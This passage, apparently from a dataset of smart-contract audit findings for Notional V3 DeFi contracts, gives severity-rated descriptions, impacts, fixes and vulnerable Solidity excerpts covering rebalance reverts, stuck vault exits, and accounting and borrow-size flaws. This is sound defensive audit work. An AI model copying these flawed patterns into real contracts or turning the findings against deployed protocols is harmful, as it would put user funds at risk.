If this exceeds `Constants.REBALANCING_UNDERLYING_DELTA`, then rebalance execution will revert.\\nThe `TreasuryAction._executeRebalance()` function will revert on a specific edge case where `oracle.getTotalUnderlyingValueStateful()` does not accrue interest before calculating the value of the treasury's `cToken` holdings.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\n`cTokenAggregator.getExchangeRateView()` returns the exchange rate which is used to calculate the underlying value of `cToken` holdings in two ways:\\nIf the interest rate model is unchanged, then we correctly accrue interest by calculating it without mutating state.\\nIf the interest rate model HAS changed, then we query `cToken.exchangeRateStored()` which DOES NOT accrue interest.\\n```\\nFile: cTokenAggregator.sol\\n function getExchangeRateView() external view override returns (int256) {\\n // Return stored exchange rate if interest rate model is updated.\\n // This prevents the function from returning incorrect 
exchange rates\\n uint256 exchangeRate = cToken.interestRateModel() == INTEREST_RATE_MODEL\\n ? _viewExchangeRate()\\n : cToken.exchangeRateStored();\\n _checkExchangeRate(exchangeRate);\\n\\n return int256(exchangeRate);\\n }\\n```\\n\\nTherefore, if the interest rate model has changed, `totalUnderlyingValueBefore` will not include any accrued interest and `totalUnderlyingValueAfter` will include all accrued interest. As a result, it is likely that the delta between these two amounts will exceed `Constants.REBALANCING_UNDERLYING_DELTA`, causing the rebalance to ultimately revert.\\nIt does not really make sense to not accrue interest if the interest rate model has changed unless we want to avoid any drastic changes to Notional's underlying protocol. Then we may want to explicitly revert here instead of allowing the rebalance function to still execute.чEnsure this is well-understand and consider accruing interest under any circumstance. Alternatively, if we do not wish to accrue interest when the interest rate model has changed, then we need to make sure that `underlyingDelta` does not include this amount as `TreasuryAction._executeDeposits()` will ultimately update the vault's position in Compound.чThe treasury manager is unable to rebalance currencies across protocols and therefore it is likely that most funds become under-utilised as a result.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n 
TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Debt cannot be repaid without redeeming vault shareчmediumчDebt cannot be repaid without redeeming the vault share. As such, users have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue, which deprives users of potential gains from their vault shares if they maintain ownership until the end.\\n```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n\\nThere is a valid scenario where users want to repay debt without redeeming their vault shares/strategy tokens (mentioned in the comments above \"or if it is set to zero\" at Line 251-263). In this case, the users will call `exitVault` with `vaultSharesToRedeem` parameter set to zero. 
The entire debt to be repaid will then be recovered directly from the account's wallet.\\nFollowing is the function trace of the VaultAccountAction.exitVault:\\n```\\nVaultAccountAction.exitVault\\n└─VaultConfiguration.redeemWithDebtRepayment\\n └─VaultConfiguration._redeem\\n └─IStrategyVault.redeemFromNotional\\n └─MetaStable2TokenAuraVault._redeemFromNotional\\n └─MetaStable2TokenAuraHelper.redeem\\n └─Balancer2TokenPoolUtils._redeem\\n └─StrategyUtils._redeemStrategyTokens\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n\\nThe problem is that if the vault shares/strategy tokens to be redeemed are zero, the `poolClaim` will be zero and cause a revert within the `StrategyUtils._redeemStrategyTokens` function call. Thus, users who want to repay debt without redeeming their vault shares/strategy tokens will be unable to do so.чWithin the `VaultConfiguration.redeemWithDebtRepayment` function, skip the vault share redemption if `vaultShares` is zero. 
In this case, the `amountTransferred` will be zero, and the subsequent code will attempt to recover the entire `underlyingExternalToRepay` amount directly from account's wallet.\\n```\\nfunction redeemWithDebtRepayment(\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n address receiver,\\n uint256 vaultShares,\\n bytes calldata data\\n) internal returns (uint256 underlyingToReceiver) {\\n uint256 amountTransferred;\\n uint256 underlyingExternalToRepay;\\n {\\n..SNIP..\\n// Add the line below\\n if (vaultShares > 0) {\\n // Repayment checks operate entirely on the underlyingExternalToRepay, the amount of\\n // prime cash raised is irrelevant here since tempCashBalance is cleared to zero as\\n // long as sufficient underlying has been returned to the protocol.\\n (amountTransferred, underlyingToReceiver, /* primeCashRaised */) = _redeem(\\n vaultConfig,\\n underlyingToken,\\n vaultAccount.account,\\n receiver,\\n vaultShares,\\n vaultAccount.maturity,\\n underlyingExternalToRepay,\\n data\\n ); \\n// Add the line below\\n }\\n..Recover any unpaid debt amount from the account directly..\\n..SNIP..\\n```\\n\\nAlternatively, update the `StrategyUtils._redeemStrategyTokens` function to handle zero vault share appropriately. However, note that the revert at Line 154 is added as part of mitigation to the \"minting zero-share\" bug in the past audit. Therefore, any changes to this part of the code must ensure that the \"minting zero-share\" bug is not being re-introduced. 
Removing the code at 153-155 might result in the user's vault share being \\"burned\\" but no assets in return under certain conditions.\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\nчUsers cannot repay debt without redeeming their vault shares/strategy tokens. To do so, they have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue so that `poolClaim > 0`, which deprives users of potential gains from their vault shares if they maintain ownership until the end.ч```\\nFile: VaultAccountAction.sol\\n    function exitVault(\\n        address account,\\n        address vault,\\n        address receiver,\\n        uint256 vaultSharesToRedeem,\\n        uint256 lendAmount,\\n        uint32 minLendRate,\\n        bytes calldata exitVaultData\\n    ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n        // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n        // redeem with debt repayment will recover the repayment from the account's wallet\\n        // directly.\\n        underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n            vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n        ));\\n```\\n -Vault account might not be able to exit after liquidationчmediumчThe vault exit might fail after a liquidation event, leading to users being unable to maintain their positions.\\nAssume that a large portion of the vault account gets liquidated which results in a large amount of cash deposited into the vault account's cash balance.
In addition, interest will also start accruing within the vault account's cash balance.\\nLet $x$ be the `primaryCash` of a vault account after a liquidation event and interest accrual.\\nThe owner of the vault account decided to exit the vault by calling `exitVault`. Within the `exitVault` function, the `vaultAccount.tempCashBalance` will be set to $x$.\\nNext, the `lendToExitVault` function is called. Assume that the cost in prime cash terms to lend an offsetting fCash position is $-y$ (primeCashCostToLend). The `updateAccountDebt` function will be called, and the `vaultAccount.tempCashBalance` will be updated to $x + (-y) \\Rightarrow x - y$. If $x > y$, then the new `vaultAccount.tempCashBalance` will be more than zero.\\nSubsequently, the `redeemWithDebtRepayment` function will be called. However, since `vaultAccount.tempCashBalance` is larger than zero, the transaction will revert, and the owner cannot exit the vault.\\n```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\nчConsider refunding the excess positive `vaultAccount.tempCashBalance` to the users so that `vaultAccount.tempCashBalance` will be cleared (set to zero) before calling the `redeemWithDebtRepayment` function.чThe owner of the vault account would not be able to exit the vault to maintain their position.
As such, their assets are stuck within the protocol.ч```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n -Rebalance process reverts due to zero amount deposit and redemptionчmediumчDepositing or redeeming zero amount against certain external money markets will cause the rebalancing process to revert.\\nFor a specific holding (e.g. cToken), the `redeemAmounts` and `depositAmounts` are mutually exclusive. So if the `redeemAmounts` for a specific holding is non-zero, the `depositAmounts` will be zero and vice-versa. This is because of the if-else block at Lines 48-56 below. Only `redeemAmounts` or `depositAmounts` of a specific holding can be initialized, but not both.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nFor each holding, the following codes always deposit or redeem a zero value. For example, cETH holding, if the `redeemAmounts` is 100 ETH, the `depositAmounts` will be zero. (because of the if-else block). 
Therefore, `getDepositCalldataForRebalancing` function will be executed and attempt to deposit zero amount to Compound.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n```\\n\\nThe problem is that the deposit/mint or redeem/burn function of certain external money markets will revert if the amount is zero. Notional is considering integrating with a few external money markets and one of them is AAVE.\\nIn this case, when Notional `deposit` zero amount to AAVE or `redeem` zero amount from AAVE, it causes the rebalancing process to revert because of the `onlyAmountGreaterThanZero` modifier on the AAVE's `deposit` and `redeem` function.\\n```\\nfunction deposit(address _reserve, uint256 _amount, uint16 _referralCode)\\n external\\n payable\\n nonReentrant\\n onlyActiveReserve(_reserve)\\n onlyUnfreezedReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\n```\\nfunction redeemUnderlying(\\n address _reserve,\\n address payable _user,\\n uint256 _amount,\\n uint256 _aTokenBalanceAfterRedeem\\n)\\n external\\n nonReentrant\\n onlyOverlyingAToken(_reserve)\\n onlyActiveReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\nThe above issue is not only limited to AAVE and might also happen in other external markets.чConsider implementing validation to ensure the contract does not deposit zero amount to or redeem zero amount from the external market.\\nFollowing is the pseudocode for the potential fixes that could be implemented within the `_getDepositCalldataForRebalancing` of the holding contract to mitigate this issue.
The same should be done for redemption.\\n```\\nfunction _getDepositCalldataForRebalancing(\\n address[] calldata holdings, \\n uint256[] calldata depositAmounts\\n) internal view virtual override returns (\\n DepositData[] memory depositData\\n) {\\n require(holdings.length == NUM_ASSET_TOKENS);\\n for (int i = 0; i < holdings.length; i++) {\\n if (depositAmounts[i] > 0) {\\n // populate the depositData[i] with the deposit calldata to external money market>\\n }\\n }\\n}\\n```\\n\\nThe above solution will return an empty calldata if the deposit amount is zero for a specific holding.\\nWithin the `_executeDeposits` function, skip the `depositData` if it has not been initialized.\\n```\\nfunction _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n uint256 totalUnderlyingDepositAmount;\\n\\n for (uint256 i; i < deposits.length; i++) {\\n DepositData memory depositData = deposits[i];\\n // if depositData is not initialized, skip to the next one\\n```\\nчNotional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market.
However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -Inaccurate settlement reserve accountingчmediumчThe off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate due to an error when handling the conversion between signed and unsigned integers.\\nEvents will be emitted to reconcile off-chain accounting for the edge condition when leveraged vaults lend at zero interest. This event will be emitted if there is fCash debt or prime cash in the settlement reserve.\\nIn an event where `s.fCashDebtHeldInSettlementReserve > 0` and `s.primeCashHeldInSettlementReserve <= 0`, no event will be emitted. As a result, the off-chain accounting of fCash debt or prime cash in the settlement reserve will be off.\\nThe reason is that since `fCashDebtInReserve` is the negation of `s.fCashDebtHeldInSettlementReserve`, which is an unsigned integer, `fCashDebtInReserve` will always be less than or equal to 0. 
Therefore, `fCashDebtInReserve` > 0 will always be false and is an unsatisfiable condition.\\n```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\nчIt is recommended to implement the following fix:\\n```\\n// Remove the line below\\n int256 fCashDebtInReserve = // Remove the line below\\nint256(s.fCashDebtHeldInSettlementReserve);\\n// Add the line below\\n int256 fCashDebtInReserve = int256(s.fCashDebtHeldInSettlementReserve);\\n```\\nчThe off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate. 
Users who rely on inaccurate accounting information to conduct any form of financial transaction will expose themselves to unintended financial risks and make ill-informed decisions.ч```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n -Rebalance stops working when more holdings are addedчmediumчNotional would not be able to rebalance its underlying holding when more holdings are added.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n 
int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nIf the underlying delta is equal to or larger than the acceptable delta, the rebalancing process will fail and revert as per Line 301 above.\\n`Constants.REBALANCING_UNDERLYING_DELTA` is currently hardcoded to $0.0001$. There is only 1 holding (cToken) in the current code base, so $0.0001$ might be the optimal acceptable delta.\\nLet $c$ be the underlying delta for cToken holding. Then, $0 <= c < 0.0001$.\\nHowever, as more external markets are added to Notional, the number of holdings will increase, and the rounding errors could accumulate. Let $a$ and $m$ be the underlying delta for aToken and morpho token respectively. Then $0 <= (c + a + m) < 0.0001$.\\nThe accumulated rounding error or underlying delta $(c + a + m)$ could be equal to or larger than $0.0001$ and cause the `_executeRebalance` function always to revert. As a result, Notional would not be able to rebalance its underlying holding.чIf the acceptable underlying delta for one holding (cToken) is $\\approx0.0001$, the acceptable underlying delta for three holdings should be $\\approx0.0003$ to factor in the accumulated rounding error or underlying delta.\\nInstead of hardcoding the `REBALANCING_UNDERLYING_DELTA`, consider allowing the governance to adjust this acceptable underlying delta to accommodate more holdings in the future and to adapt to potential changes in market conditions.чNotional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. 
If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Underlying delta is calculated on internal token balanceчmediumчThe underlying delta is calculated on the internal token balance, which might cause inconsistency with
tokens of varying decimals.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nThe `underlyingDelta` is denominated in internal token precision (1e8) and is computed by taking the difference between `totalUnderlyingValueBefore` and `totalUnderlyingValueAfter` in Line 300 above.\\nNext, the `underlyingDelta` is compared against the `Constants.REBALANCING_UNDERLYING_DELTA` (10_000=0.0001) to ensure that the rebalance did not exceed the acceptable delta threshold.\\nHowever, the same `Constants.REBALANCING_UNDERLYING_DELTA` is used across all tokens such as ETH, DAI, and USDC. As a result, the delta will not be consistent with tokens of varying decimals.чConsider using the external token balance and scale `Constants.REBALANCING_UNDERLYING_DELTA` to the token's decimals.чUsing the internal token precision (1e8) might result in an over-sensitive trigger for tokens with fewer decimals (e.g. 1e6) as they are scaled up and an under-sensitive one for tokens with more decimals (e.g. 
1e18) as they are scaled down, leading to inconsistency across different tokens when checking against the `Constants.REBALANCING_UNDERLYING_DELTA`.\\nThis also means that the over-sensitive one will trigger a revert more easily and vice versa.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Secondary debt dust balances are not truncatedчmediumчDust balances in primary debt are truncated toward zero. However, this truncation was not performed against secondary debts.\\n```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n\\n`vaultState.totalDebtUnderlying` is primarily used to track the total debt of primary currency. 
Within the `updateAccountDebt` function, any dust balance in the `vaultState.totalDebtUnderlying` is truncated towards zero at the end of the function as shown above.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _updateTotalSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint16 currencyId,\\n uint256 maturity,\\n int256 netUnderlyingDebt,\\n PrimeRate memory pr\\n ) private {\\n VaultStateStorage storage balance = LibStorage.getVaultSecondaryBorrow()\\n [vaultConfig.vault][maturity][currencyId];\\n int256 totalDebtUnderlying = VaultStateLib.readDebtStorageToUnderlying(pr, maturity, balance.totalDebt);\\n \\n // Set the new debt underlying to storage\\n totalDebtUnderlying = totalDebtUnderlying.add(netUnderlyingDebt);\\n VaultStateLib.setTotalDebtStorage(\\n balance, pr, vaultConfig, currencyId, maturity, totalDebtUnderlying, false // not settled\\n );\\n```\\n\\nHowever, this approach was not consistently applied when handling dust balance in secondary debt within the `_updateTotalSecondaryDebt` function. 
Within the `_updateTotalSecondaryDebt` function, the dust balance in secondary debts is not truncated.чConsider truncating dust balance in secondary debt within the `_updateTotalSecondaryDebt` function similar to what has been done for primary debt.чThe inconsistency in handling dust balances in primary and secondary debt could potentially lead to discrepancies in debt accounting within the protocol, accumulation of dust, and result in unforeseen consequences.ч```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n -No minimum borrow size check against secondary debtsчmediumчSecondary debts were not checked against the minimum borrow size during exit, which could lead to accounts with insufficient debt becoming insolvent and the protocol incurring bad debts.\\n```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. 
If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, \"Min Borrow\");\\n }\\n```\\n\\nA vault account has one primary debt (accountDebtUnderlying) and one or more secondary debts (accountDebtOne and accountDebtTwo).\\nWhen a vault account exits the vault, Notional will check that its primary debt (accountDebtUnderlying) meets the minimum borrow size requirement. If a vault account wants to exit under the minimum borrow size it must fully exit so that we do not have dust accounts that become insolvent. This check is being performed in Line 140 above.\\nHowever, this check is not performed against the secondary debts. As a result, it is possible that the secondary debts fall below the minimum borrow size after exiting.чConsider performing a similar check against the secondary debts (accountDebtOne and accountDebtTwo) within the `_setVaultAccount` function to ensure they do not fall below the minimum borrow size.чVault accounts with debt below the minimum borrow size are at risk of becoming insolvent, leaving the protocol with bad debts.ч```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. 
If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, \"Min Borrow\");\\n }\\n```\\n -It may be possible to liquidate on behalf of another accountчmediumчIf the caller of any liquidation action is the vault itself, there is no validation of the `liquidator` parameter and therefore, any arbitrary account may act as the `liquidator` if they have approved any amount of funds for the `VaultLiquidationAction.sol` contract.\\nWhile the vault implementation itself should most likely handle proper validation of the parameters provided to actions enabled by the vault, the majority of important validation should be done within the Notional protocol. 
